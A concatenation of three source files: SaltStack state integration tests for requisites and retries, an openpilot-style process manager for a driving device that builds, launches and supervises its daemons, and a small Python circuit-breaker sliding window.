state_run = self.run_function('state.sls', mods='requisites.listen_simple')
# Both listeners are expected to trigger
listener_state = 'cmd_|-listener_test_listening_resolution_one_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
listener_state = 'cmd_|-listener_test_listening_resolution_two_|-echo "Successful listen resolution"_|-mod_watch'
self.assertIn(listener_state, state_run)
def test_listen_requisite_no_state_module(self):
'''
Tests a simple state using the listen requisite
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_simple_no_state_module')
# First, test the result of the state run when a listener is expected to trigger
listener_state = 'cmd_|-listener_test_listening_change_state_|-echo "Listening State"_|-mod_watch'
self.assertIn(listener_state, state_run)
# Then, test the result of the state run when a listener should not trigger
absent_state = 'cmd_|-listener_test_listening_non_changing_state_|-echo "Only run once"_|-mod_watch'
self.assertNotIn(absent_state, state_run)
def test_listen_in_requisite_resolution_names(self):
'''
Verify listen_in requisite lookups use ID declaration to check for changes
and resolves the magic 'names' state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_in_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_listen_requisite_resolution_names(self):
'''
Verify listen requisite lookups use ID declaration to check for changes
and resolves the magic 'names' state variable
'''
# Only run the state once and keep the return data
state_run = self.run_function('state.sls', mods='requisites.listen_names')
self.assertIn('test_|-listener_service_|-nginx_|-mod_watch', state_run)
self.assertIn('test_|-listener_service_|-crond_|-mod_watch', state_run)
def test_issue_30820_requisite_in_match_by_name(self):
'''
This tests the case where a requisite_in matches by name instead of ID
See https://github.com/saltstack/salt/issues/30820 for more info
'''
state_run = self.run_function(
'state.sls',
mods='requisites.requisite_in_match_by_name'
)
bar_state = 'cmd_|-bar state_|-echo bar_|-wait'
self.assertIn(bar_state, state_run)
self.assertEqual(state_run[bar_state]['comment'],
'Command "echo bar" run')
def test_retry_option_defaults(self):
'''
test the retry option on a simple state with defaults
ensure comment is as expected
ensure state duration is greater than default retry_interval (30 seconds)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_defaults'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Specified path /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 30)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_custom(self):
'''
test the retry option on a simple state with custom retry values
ensure comment is as expected
ensure state duration is greater than custom defined interval * (retries - 1)
'''
state_run = self.run_function(
'state.sls',
mods='retry.retry_custom'
)
retry_state = 'file_|-file_test_|-/path/to/a/non-existent/file.txt_|-exists'
expected_comment = ('Attempt 1: Returned a result of "False", with the following '
'comment: "Specified path /path/to/a/non-existent/file.txt does not exist"\n'
'Attempt 2: Returned a result of "False", with the following comment: "Specified'
' path /path/to/a/non-existent/file.txt does not exist"\nAttempt 3: Returned'
' a result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nAttempt 4: Returned a'
' result of "False", with the following comment: "Specified path'
' /path/to/a/non-existent/file.txt does not exist"\nSpecified path'
' /path/to/a/non-existent/file.txt does not exist')
self.assertEqual(state_run[retry_state]['comment'], expected_comment)
self.assertTrue(state_run[retry_state]['duration'] > 40)
self.assertEqual(state_run[retry_state]['result'], False)
def test_retry_option_success(self):
'''
test a state with the retry option that should return True immediately (i.e. no retries)
'''
testfile = os.path.join(TMP, 'retry_file')
state_run = self.run_function(
'state.sls',
mods='retry.retry_success'
)
os.unlink(testfile)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertNotIn('Attempt', state_run[retry_state]['comment'])
def run_create(self):
'''
helper function to wait 30 seconds and then create the temp retry file
'''
testfile = os.path.join(TMP, 'retry_file')
time.sleep(30)
with salt.utils.files.fopen(testfile, 'a'):
pass
def test_retry_option_eventual_success(self):
'''
test a state with the retry option that should return True after at least 4 retry attempts
but never reach 15 attempts
'''
testfile = os.path.join(TMP, 'retry_file')
create_thread = threading.Thread(target=self.run_create)
create_thread.start()
state_run = self.run_function(
'state.sls',
mods='retry.retry_success2'
)
retry_state = 'file_|-file_test_|-{0}_|-exists'.format(testfile)
self.assertIn('Attempt 1:', state_run[retry_state]['comment'])
self.assertIn('Attempt 2:', state_run[retry_state]['comment'])
self.assertIn('Attempt 3:', state_run[retry_state]['comment'])
self.assertIn('Attempt 4:', state_run[retry_state]['comment'])
self.assertNotIn('Attempt 15:', state_run[retry_state]['comment'])
self.assertEqual(state_run[retry_state]['result'], True)
def test_issue_38683_require_order_failhard_combination(self):
'''
This tests the case where require, order, and failhard are all used together in a state definition.
Previously, the order option, when used in tandem with require and failhard, would cause the state
compiler to stacktrace. This exposed a logic error in the ``check_failhard`` function of the state
compiler. With the logic error resolved, this test should now pass.
See https://github.com/saltstack/salt/issues/38683 for more information.
'''
state_run = self.run_function(
'state.sls',
mods='requisites.require_order_failhard_combo'
)
state_id = 'test_|-b_|-b_|-fail_with_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'], 'Failure!')
self.assertFalse(state_run[state_id]['result'])
def test_issue_46762_prereqs_on_a_state_with_unfulfilled_requirements(self):
'''
This tests the case where state C requires state A, which fails.
State C is a pre-required state for State B.
Since state A fails, state C will not run because the requisite failed,
therefore state B will not run because state C failed to run.
See https://github.com/saltstack/salt/issues/46762 for
more information.
'''
state_run = self.run_function(
'state.sls',
mods='issue-46762'
)
state_id = 'test_|-a_|-a_|-fail_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Failure!')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-b_|-b_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.c')
self.assertFalse(state_run[state_id]['result'])
state_id = 'test_|-c_|-c_|-nop'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'One or more requisite failed: issue-46762.a')
self.assertFalse(state_run[state_id]['result'])
def test_state_nonbase_environment(self):
'''
test state.sls with saltenv using a nonbase environment
with a salt source
'''
filename = os.path.join(TMP, 'nonbase_env')
try:
ret = self.run_function(
'state.sls',
mods='non-base-env',
saltenv='prod'
)
ret = ret[next(iter(ret))]
assert ret['result']
assert ret['comment'] == 'File {0} updated'.format(filename)
assert os.path.isfile(filename)
finally:
try:
os.remove(filename)
except OSError:
pass
@skipIf(sys.platform.startswith('win'), 'Skipped until parallel states can be fixed on Windows')
def test_parallel_state_with_long_tag(self):
'''
This tests the case where the state being executed has a long ID dec or
name and states are being run in parallel. The filenames used for the
parallel state cache were previously based on the tag for each chunk,
and longer ID decs or name params can cause the cache file to be longer
than the operating system's max file name length. To counter this we
instead generate a SHA1 hash of the chunk's tag to use as the cache
filename. This test will ensure that long tags don't cause caching
failures.
See https://github.com/saltstack/salt/issues/49738 for more info.
'''
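# For example, hashlib.sha1(tag.encode()).hexdigest() always yields 40 hex characters,
# so even a very long tag maps to a fixed-length cache filename.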
short_command = 'helloworld'
long_command = short_command * 25
ret = self.run_function(
'state.sls',
mods='issue-49738',
pillar={'short_command': short_command,
'long_command': long_command}
)
comments = sorted([x['comment'] for x in six.itervalues(ret)])
expected = sorted(['Command "{0}" run'.format(x)
for x in (short_command, long_command)])
assert comments == expected, '{0} != {1}'.format(comments, expected)
def _add_runtime_pillar(self, pillar):
'''
helper method to add pillar data at runtime
'''
import salt.utils.yaml
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE,
'pillar.sls'), 'w') as fp:
salt.utils.yaml.safe_dump(pillar, fp)
with salt.utils.files.fopen(os.path.join(TMP_PILLAR_TREE, 'top.sls'), 'w') as fp:
fp.write(textwrap.dedent('''\
base:
'*':
- pillar
'''))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
def test_state_sls_id_test(self):
'''
test state.sls_id when test is set
to true in pillar data
'''
self._add_runtime_pillar(pillar={'test': True})
testfile = os.path.join(TMP, 'testfile')
comment = 'The file {0} is set to be changed'.format(testfile)
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'], comment)
self.assertEqual(val['changes'], {'newfile': testfile})
def test_state_sls_id_test_state_test_post_run(self):
'''
test state.sls_id when test is set to
true after the state has already been run
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_true(self):
'''
test state.sls_id when test=True is passed as arg
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is set to be changed'.format(file_name))
self.assertEqual(val['changes'], {'newfile': file_name})
def test_state_sls_id_test_true_post_run(self):
'''
test state.sls_id when test=True is passed as an
arg after the state has already been run
'''
file_name = os.path.join(TMP, 'testfile')
ret = self.run_function('state.sls', ['core'])
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
ret = self.run_function('state.sls', ['core'], test=True)
for key, val in ret.items():
self.assertEqual(
val['comment'],
'The file {0} is in the correct state'.format(file_name))
self.assertEqual(val['changes'], {})
def test_state_sls_id_test_false_pillar_true(self):
'''
test state.sls_id when test is set to false as an
arg and minion_state_test is set to True. Should
return test=False.
'''
file_name = os.path.join(TMP, 'testfile')
self._add_runtime_pillar(pillar={'test': True})
ret = self.run_function('state.sls', ['core'], test=False)
for key, val in ret.items():
self.assertEqual(val['comment'],
'File {0} updated'.format(file_name))
self.assertEqual(val['changes']['diff'], 'New file')
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters(self):
'''
test state.sls when state file contains non-ascii characters
'''
ret = self.run_function('state.sls', ['issue-46672'])
log.debug('== ret %s ==', type(ret))
_expected = "cmd_|-echo1_|-echo 'This is Æ test!'_|-run"
self.assertIn(_expected, ret)
@skipIf(six.PY3 and salt.utils.platform.is_darwin(), 'Test is broken on macosx and PY3')
def test_state_sls_unicode_characters_cmd_output(self):
'''
test the output from running an echo command with non-ascii
characters.
'''
ret = self.run_function('state.sls', ['issue-46672-a'])
key = list(ret.keys())[0]
log.debug('== ret %s ==', type(ret))
_expected = 'This is Æ test!'
if salt.utils.platform.is_windows():
# Windows cmd.exe will mangle the output using cmd's codepage.
if six.PY2:
_expected = "'This is A+ test!'"
else:
_expected = "'This is ’ test!'"
self.assertEqual(_expected, ret[key]['changes']['stdout'])
def tearDown(self):
nonbase_file = os.path.join(TMP, 'nonbase_env')
if os.path.isfile(nonbase_file):
os.remove(nonbase_file)
# remove old pillar data
for filename in os.listdir(TMP_PILLAR_TREE):
os.remove(os.path.join(TMP_PILLAR_TREE, filename))
self.run_function('saltutil.refresh_pillar')
self.run_function('test.sleep', [5])
# remove testfile added in core.sls state file
state_file = os.path.join(TMP, 'testfile')
if os.path.isfile(state_file):
os.remove(state_file)
def test_state_sls_integer_name(self):
'''
This tests the case where the state file is named
only with integers
'''
state_run = self.run_function(
'state.sls',
mods='12345'
)
state_id = 'test_|-always-passes_|-always-passes_|-succeed_without_changes'
self.assertIn(state_id, state_run)
self.assertEqual(state_run[state_id]['comment'],
'Success!')
self.assertTrue(state_run[state_id]['result'])
|
manager.py
|
#!/usr/bin/env python3.7
import os
import time
import sys
import fcntl
import errno
import signal
import shutil
import subprocess
import datetime
import textwrap
from selfdrive.swaglog import cloudlog, add_logentries_handler
from common.basedir import BASEDIR, PARAMS
from common.android import ANDROID
WEBCAM = os.getenv("WEBCAM") is not None
sys.path.append(os.path.join(BASEDIR, "pyextra"))
os.environ['BASEDIR'] = BASEDIR
TOTAL_SCONS_NODES = 1140
prebuilt = os.path.exists(os.path.join(BASEDIR, 'prebuilt'))
# Create folders needed for msgq
try:
os.mkdir("/dev/shm")
except FileExistsError:
pass
except PermissionError:
print("WARNING: failed to make /dev/shm")
if ANDROID:
os.chmod("/dev/shm", 0o777)
def unblock_stdout():
# get a non-blocking stdout
child_pid, child_pty = os.forkpty()
if child_pid != 0: # parent
# child is in its own process group, manually pass kill signals
signal.signal(signal.SIGINT, lambda signum, frame: os.kill(child_pid, signal.SIGINT))
signal.signal(signal.SIGTERM, lambda signum, frame: os.kill(child_pid, signal.SIGTERM))
fcntl.fcntl(sys.stdout, fcntl.F_SETFL,
fcntl.fcntl(sys.stdout, fcntl.F_GETFL) | os.O_NONBLOCK)
while True:
try:
dat = os.read(child_pty, 4096)
except OSError as e:
if e.errno == errno.EIO:
break
continue
if not dat:
break
try:
sys.stdout.write(dat.decode('utf8'))
except (OSError, IOError, UnicodeDecodeError):
pass
# os.wait() returns a tuple with the pid and a 16-bit value
# whose low byte is the signal number and whose high byte is the exit status
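# For example, a raw wait status of 0x0100 (256) decodes to exit status 1 and no signal.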
exit_status = os.wait()[1] >> 8
os._exit(exit_status)
if __name__ == "__main__":
unblock_stdout()
if __name__ == "__main__" and ANDROID:
from common.spinner import Spinner
from common.text_window import TextWindow
else:
from common.spinner import FakeSpinner as Spinner
from common.text_window import FakeTextWindow as TextWindow
if not (os.system("python3 -m pip list | grep 'scipy' ") == 0):
os.system("cd /data/openpilot/installer/scipy_installer/ && ./scipy_installer")
import importlib
import traceback
from multiprocessing import Process
# Run scons
spinner = Spinner()
spinner.update("0")
if not prebuilt:
for retry in [True, False]:
# run scons
env = os.environ.copy()
env['SCONS_PROGRESS'] = "1"
env['SCONS_CACHE'] = "1"
nproc = os.cpu_count()
j_flag = "" if nproc is None else "-j%d" % (nproc - 1)
scons = subprocess.Popen(["scons", j_flag], cwd=BASEDIR, env=env, stderr=subprocess.PIPE)
compile_output = []
# Read progress from stderr and update spinner
while scons.poll() is None:
try:
line = scons.stderr.readline()
if line is None:
continue
line = line.rstrip()
prefix = b'progress: '
if line.startswith(prefix):
i = int(line[len(prefix):])
if spinner is not None:
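# scons progress is mapped onto the first 70% of the spinner;
# manager_prepare() later fills in the remaining 30% (see its `total` calculation).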
spinner.update("%d" % (70.0 * (i / TOTAL_SCONS_NODES)))
elif len(line):
compile_output.append(line)
print(line.decode('utf8', 'replace'))
except Exception:
pass
if scons.returncode != 0:
# Read remaining output
r = scons.stderr.read().split(b'\n')
compile_output += r
if retry:
print("scons build failed, cleaning in")
for i in range(3,-1,-1):
print("....%d" % i)
time.sleep(1)
subprocess.check_call(["scons", "-c"], cwd=BASEDIR, env=env)
shutil.rmtree("/tmp/scons_cache")
else:
# Build failed; log the errors
errors = [line.decode('utf8', 'replace') for line in compile_output
if any([err in line for err in [b'error: ', b'not found, needed by target']])]
error_s = "\n".join(errors)
add_logentries_handler(cloudlog)
cloudlog.error("scons build failed\n" + error_s)
# Show TextWindow
error_s = "\n \n".join(["\n".join(textwrap.wrap(e, 65)) for e in errors])
with TextWindow("Openpilot failed to build\n \n" + error_s) as t:
t.wait_for_exit()
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
exit(1)
else:
break
import cereal
import cereal.messaging as messaging
from common.params import Params
import selfdrive.crash as crash
from selfdrive.registration import register
from selfdrive.version import version, dirty
from selfdrive.loggerd.config import ROOT
from selfdrive.launcher import launcher
from common import android
from common.apk import update_apks, pm_apply_packages, start_offroad
from common.manager_helpers import print_cpu_usage
ThermalStatus = cereal.log.ThermalData.ThermalStatus
# comment out anything you don't want to run
managed_processes = {
"thermald": "selfdrive.thermald.thermald",
"trafficd": ("selfdrive/trafficd", ["./trafficd"]),
"traffic_manager": "selfdrive.trafficd.traffic_manager",
"thermalonlined": "selfdrive.thermalonlined",
"uploader": "selfdrive.loggerd.uploader",
"deleter": "selfdrive.loggerd.deleter",
"controlsd": "selfdrive.controls.controlsd",
"plannerd": "selfdrive.controls.plannerd",
"radard": "selfdrive.controls.radard",
"dmonitoringd": "selfdrive.controls.dmonitoringd",
"ubloxd": ("selfdrive/locationd", ["./ubloxd"]),
"loggerd": ("selfdrive/loggerd", ["./loggerd"]),
"logmessaged": "selfdrive.logmessaged",
"locationd": "selfdrive.locationd.locationd",
"tombstoned": "selfdrive.tombstoned",
"logcatd": ("selfdrive/logcatd", ["./logcatd"]),
"proclogd": ("selfdrive/proclogd", ["./proclogd"]),
"boardd": ("selfdrive/boardd", ["./boardd"]), # not used directly
"pandad": "selfdrive.pandad",
"ui": ("selfdrive/ui", ["./ui"]),
"calibrationd": "selfdrive.locationd.calibrationd",
"paramsd": ("selfdrive/locationd", ["./paramsd"]),
"camerad": ("selfdrive/camerad", ["./camerad"]),
"sensord": ("selfdrive/sensord", ["./sensord"]),
"clocksd": ("selfdrive/clocksd", ["./clocksd"]),
"gpsd": ("selfdrive/sensord", ["./gpsd"]),
"updated": "selfdrive.updated",
"dmonitoringmodeld": ("selfdrive/modeld", ["./dmonitoringmodeld"]),
"modeld": ("selfdrive/modeld", ["./modeld"]),
"mapd": ("selfdrive/mapd", ["./mapd.py"]),
"driverview": "selfdrive.controls.lib.driverview",
}
daemon_processes = {
"manage_athenad": ("selfdrive.athena.manage_athenad", "AthenadPid"),
}
running = {}
def get_running():
return running
# due to qualcomm kernel bugs SIGKILLing camerad sometimes causes page table corruption
unkillable_processes = ['camerad']
# processes to end with SIGINT instead of SIGTERM
interrupt_processes = []
# processes to end with SIGKILL instead of SIGTERM
kill_processes = ['sensord', 'paramsd']
# processes to end if thermal conditions exceed Green parameters
green_temp_processes = ['uploader']
persistent_processes = [
'thermald',
'logmessaged',
'ui',
'uploader',
]
if ANDROID:
persistent_processes += [
'logcatd',
'tombstoned',
'updated',
]
car_started_processes = [
'controlsd',
'plannerd',
'loggerd',
'radard',
'trafficd',
'calibrationd',
'paramsd',
'camerad',
'modeld',
'proclogd',
'ubloxd',
'mapd',
'thermalonlined',
'locationd',
'traffic_manager',
'dmonitoringd',
]
if WEBCAM:
car_started_processes += [
'dmonitoringmodeld',
]
if ANDROID:
car_started_processes += [
'sensord',
'clocksd',
'gpsd',
'dmonitoringmodeld',
'deleter',
]
def register_managed_process(name, desc, car_started=False):
global managed_processes, car_started_processes, persistent_processes
print("registering %s" % name)
managed_processes[name] = desc
if car_started:
car_started_processes.append(name)
else:
persistent_processes.append(name)
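# Hypothetical example (process name and module are placeholders for illustration):
#   register_managed_process("exampled", "selfdrive.exampled", car_started=True)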
# ****************** process management functions ******************
def nativelauncher(pargs, cwd):
# exec the process
os.chdir(cwd)
# because when extracted from pex zips permissions get lost -_-
os.chmod(pargs[0], 0o700)
os.execvp(pargs[0], pargs)
def start_managed_process(name):
if name in running or name not in managed_processes:
return
proc = managed_processes[name]
if isinstance(proc, str):
cloudlog.info("starting python %s" % proc)
running[name] = Process(name=name, target=launcher, args=(proc,))
else:
pdir, pargs = proc
cwd = os.path.join(BASEDIR, pdir)
cloudlog.info("starting process %s" % name)
running[name] = Process(name=name, target=nativelauncher, args=(pargs, cwd))
running[name].start()
def start_daemon_process(name):
params = Params()
proc, pid_param = daemon_processes[name]
pid = params.get(pid_param, encoding='utf-8')
if pid is not None:
try:
os.kill(int(pid), 0)
with open(f'/proc/{pid}/cmdline') as f:
if proc in f.read():
# daemon is running
return
except (OSError, FileNotFoundError):
# process is dead
pass
cloudlog.info("starting daemon %s" % name)
proc = subprocess.Popen(['python', '-m', proc],
stdin=open('/dev/null', 'r'),
stdout=open('/dev/null', 'w'),
stderr=open('/dev/null', 'w'),
preexec_fn=os.setpgrp)
params.put(pid_param, str(proc.pid))
def prepare_managed_process(p):
proc = managed_processes[p]
if isinstance(proc, str):
# pre-import this python module
cloudlog.info("preimporting %s" % proc)
importlib.import_module(proc)
elif os.path.isfile(os.path.join(BASEDIR, proc[0], "Makefile")):
# build this process
cloudlog.info("building %s" % (proc,))
try:
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
except subprocess.CalledProcessError:
# make clean if the build failed
if proc[0] != 'selfdrive/mapd':
cloudlog.warning("building %s failed, make clean" % (proc, ))
subprocess.check_call(["make", "clean"], cwd=os.path.join(BASEDIR, proc[0]))
subprocess.check_call(["make", "-j4"], cwd=os.path.join(BASEDIR, proc[0]))
def join_process(process, timeout):
# Process().join(timeout) will hang due to a python 3 bug: https://bugs.python.org/issue28382
# We have to poll the exitcode instead
t = time.time()
while time.time() - t < timeout and process.exitcode is None:
time.sleep(0.001)
def kill_managed_process(name):
if name not in running or name not in managed_processes:
return
cloudlog.info("killing %s" % name)
if running[name].exitcode is None:
if name in interrupt_processes:
os.kill(running[name].pid, signal.SIGINT)
elif name in kill_processes:
os.kill(running[name].pid, signal.SIGKILL)
else:
running[name].terminate()
join_process(running[name], 5)
if running[name].exitcode is None:
if name in unkillable_processes:
cloudlog.critical("unkillable process %s failed to exit! rebooting in 15 if it doesn't die" % name)
join_process(running[name], 15)
if running[name].exitcode is None:
cloudlog.critical("FORCE REBOOTING PHONE!")
os.system("date >> /sdcard/unkillable_reboot")
os.system("reboot")
raise RuntimeError
else:
cloudlog.info("killing %s with SIGKILL" % name)
os.kill(running[name].pid, signal.SIGKILL)
running[name].join()
cloudlog.info("%s is dead with %d" % (name, running[name].exitcode))
del running[name]
def cleanup_all_processes(signal, frame):
cloudlog.info("caught ctrl-c %s %s" % (signal, frame))
if ANDROID:
pm_apply_packages('disable')
for name in list(running.keys()):
kill_managed_process(name)
cloudlog.info("everything is dead")
# ****************** run loop ******************
def manager_init(should_register=True):
if should_register:
reg_res = register()
if reg_res:
dongle_id = reg_res
else:
raise Exception("server registration failed")
else:
dongle_id = "c"*16
# set dongle id
cloudlog.info("dongle id is " + dongle_id)
os.environ['DONGLE_ID'] = dongle_id
cloudlog.info("dirty is %d" % dirty)
if not dirty:
os.environ['CLEAN'] = '1'
cloudlog.bind_global(dongle_id=dongle_id, version=version, dirty=dirty, is_eon=True)
crash.bind_user(id=dongle_id)
crash.bind_extra(version=version, dirty=dirty, is_eon=True)
os.umask(0)
try:
os.mkdir(ROOT, 0o777)
except OSError:
pass
# ensure shared libraries are readable by apks
if ANDROID:
os.chmod(BASEDIR, 0o755)
os.chmod(os.path.join(BASEDIR, "cereal"), 0o755)
os.chmod(os.path.join(BASEDIR, "cereal", "libmessaging_shared.so"), 0o755)
def manager_thread():
# now loop
thermal_sock = messaging.sub_sock('thermal')
gps_sock = messaging.sub_sock('gpsLocation', conflate=True)
if os.getenv("GET_CPU_USAGE"):
proc_sock = messaging.sub_sock('procLog', conflate=True)
cloudlog.info("manager start")
cloudlog.info({"environ": os.environ})
# save boot log
#subprocess.call(["./loggerd", "--bootlog"], cwd=os.path.join(BASEDIR, "selfdrive/loggerd"))
params = Params()
# start daemon processes
#for p in daemon_processes:
# start_daemon_process(p)
# start persistent processes
for p in persistent_processes:
start_managed_process(p)
# start offroad
if ANDROID:
pm_apply_packages('enable')
start_offroad()
if os.getenv("NOBOARD") is None:
start_managed_process("pandad")
if os.getenv("BLOCK") is not None:
for k in os.getenv("BLOCK").split(","):
del managed_processes[k]
logger_dead = False
start_t = time.time()
first_proc = None
while 1:
gps = messaging.recv_one_or_none(gps_sock)
msg = messaging.recv_sock(thermal_sock, wait=True)
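# NOTE: as written, both branches of the GPS check below set logger_dead to True,
# so logger_dead is set whenever any gpsLocation message is received, regardless of position.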
if gps:
if 47.3024876979 < gps.gpsLocation.latitude < 54.983104153 and 5.98865807458 < gps.gpsLocation.longitude < 15.0169958839:
logger_dead = True
else:
logger_dead = True
# heavyweight batch processes are gated on favorable thermal conditions
if msg.thermal.thermalStatus >= ThermalStatus.yellow:
for p in green_temp_processes:
if p in persistent_processes:
kill_managed_process(p)
else:
for p in green_temp_processes:
if p in persistent_processes:
start_managed_process(p)
if msg.thermal.freeSpace < 0.05:
logger_dead = True
if msg.thermal.started and "driverview" not in running:
for p in car_started_processes:
if p == "loggerd" and logger_dead:
kill_managed_process(p)
else:
start_managed_process(p)
else:
logger_dead = False
for p in reversed(car_started_processes):
kill_managed_process(p)
# this is ugly
if "driverview" not in running and params.get("IsDriverViewEnabled") == b"1":
start_managed_process("driverview")
elif "driverview" in running and params.get("IsDriverViewEnabled") == b"0":
kill_managed_process("driverview")
# check the status of all processes, did any of them die?
running_list = ["%s%s\u001b[0m" % ("\u001b[32m" if running[p].is_alive() else "\u001b[31m", p) for p in running]
cloudlog.debug(' '.join(running_list))
# Exit main loop when uninstall is needed
if params.get("DoUninstall", encoding='utf8') == "1":
break
if os.getenv("GET_CPU_USAGE"):
dt = time.time() - start_t
# Get first sample
if dt > 30 and first_proc is None:
first_proc = messaging.recv_sock(proc_sock)
# Get last sample and exit
if dt > 90:
last_proc = messaging.recv_sock(proc_sock, wait=True)
cleanup_all_processes(None, None)
sys.exit(print_cpu_usage(first_proc, last_proc))
def manager_prepare(spinner=None):
# build all processes
os.chdir(os.path.dirname(os.path.abspath(__file__)))
# When not prebuilt, scons already advanced the spinner to 70%, so continue from there
total = 100.0 if prebuilt else 30.0
for i, p in enumerate(managed_processes):
if spinner is not None:
spinner.update("%d" % ((100.0 - total) + total * (i + 1) / len(managed_processes),))
prepare_managed_process(p)
def uninstall():
cloudlog.warning("uninstalling")
with open('/cache/recovery/command', 'w') as f:
f.write('--wipe_data\n')
# IPowerManager.reboot(confirm=false, reason="recovery", wait=true)
android.reboot(reason="recovery")
def main():
os.environ['PARAMS_PATH'] = PARAMS
# the flippening!
os.system('LD_LIBRARY_PATH="" content insert --uri content://settings/system --bind name:s:user_rotation --bind value:i:1')
# disable bluetooth
os.system('service call bluetooth_manager 8')
params = Params()
params.manager_start()
default_params = [
("CommunityFeaturesToggle", "0"),
("CompletedTrainingVersion", "0"),
("IsRHD", "0"),
("IsMetric", "0"),
("RecordFront", "0"),
("HasAcceptedTerms", "0"),
("HasCompletedSetup", "0"),
("IsUploadRawEnabled", "1"),
("IsLdwEnabled", "1"),
("IsGeofenceEnabled", "-1"),
("SpeedLimitOffset", "0"),
("LongitudinalControl", "0"),
("LimitSetSpeed", "0"),
("LimitSetSpeedNeural", "0"),
("LastUpdateTime", datetime.datetime.utcnow().isoformat().encode('utf8')),
("OpenpilotEnabledToggle", "1"),
("VisionRadarToggle", "0"),
("LaneChangeEnabled", "1"),
("IsDriverViewEnabled", "0"),
("DisablePowerDownTime", "30"),
]
# set unset params
for k, v in default_params:
if params.get(k) is None:
params.put(k, v)
# is this chffrplus?
if os.getenv("PASSIVE") is not None:
params.put("Passive", str(int(os.getenv("PASSIVE"))))
if params.get("Passive") is None:
raise Exception("Passive must be set to continue")
if ANDROID:
update_apks()
manager_init()
manager_prepare(spinner)
spinner.close()
if os.getenv("PREPAREONLY") is not None:
return
# SystemExit on sigterm
signal.signal(signal.SIGTERM, lambda signum, frame: sys.exit(1))
try:
manager_thread()
except SystemExit:
raise
except Exception:
traceback.print_exc()
crash.capture_exception()
finally:
cleanup_all_processes(None, None)
if params.get("DoUninstall", encoding='utf8') == "1":
uninstall()
if __name__ == "__main__":
try:
main()
except Exception:
add_logentries_handler(cloudlog)
cloudlog.exception("Manager failed to start")
# Show last 3 lines of traceback
error = traceback.format_exc(3)
error = "Manager failed to start\n \n" + error
with TextWindow(error) as t:
t.wait_for_exit()
process = subprocess.check_output(['git', 'pull'])
os.system('reboot')
raise
# manual exit because we are forked
sys.exit(0)
|
slidingwindow.py
|
# -*- coding: utf-8 -*-
import threading
import time
import bucket
OPEN = 0
CLOSE = 1
HALF_OPEN = 2
class SlidingWindow(object):
def __init__(self, rate, period, half_seconds, sample_count, step, threshold_percentage):
"""
SlidingWindow
"""
self.rate = rate
self.period = period
self.half_seconds = half_seconds
self.sample_count = sample_count
self.tail = 0
self.buckets = []
self.step = step
self.status = CLOSE
self._semaphore = threading.Semaphore(1)
self._threshold_percentage = threshold_percentage
for _ in xrange(period / rate):
self.buckets.append(bucket.Bucket())
def increase_total(self):
self.buckets[self.tail].add_total(self.step)
def increase_fail(self):
self.buckets[self.tail].add_fail(self.step)
def _calculate_failure_rate(self):
"""
Calculate the failure rate
:return:
"""
total, fail = 0, 0
for i in xrange(self.tail + 1):
total += self.buckets[i].total
fail += self.buckets[i].fail
return float(fail) / float(total)
def _total(self):
total = 0
for i in xrange(self.tail + 1):
total += self.buckets[i].total
return total
def acquire_sem(self):
return self._semaphore.acquire(False)
def release_sem(self):
return self._semaphore.release()
def start(self):
thread = threading.Thread(target=self.increase_tail, name='increase_tail_thread')
thread.setDaemon(True)
thread.start()
def increase_tail(self):
"""
slide the window: open the breaker when the failure rate exceeds the threshold,
then advance the tail, creating a new bucket once the window is full
:return:
"""
while 1:
# decide whether to open the breaker
if self.status == CLOSE and self._total() > self.sample_count and self._calculate_failure_rate() > self._threshold_percentage:
self.set_open()
if self.tail + 1 >= self.period / self.rate:
tmp_buckets = self.buckets[1:self.tail + 1]
tmp_buckets.append(bucket.Bucket())
self.buckets = tmp_buckets
else:
self.tail += 1
time.sleep(self.rate / 1000)
def _set_half_open(self):
self.status = HALF_OPEN
def set_open(self):
"""
Set the breaker status to OPEN
:return:
"""
self.status = OPEN
threading.Timer(self.half_seconds / 1000, self._set_half_open).start()
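# Minimal usage sketch (argument values are illustrative assumptions, not defaults):
#   window = SlidingWindow(rate=100, period=1000, half_seconds=5000,
#                          sample_count=20, step=1, threshold_percentage=0.5)
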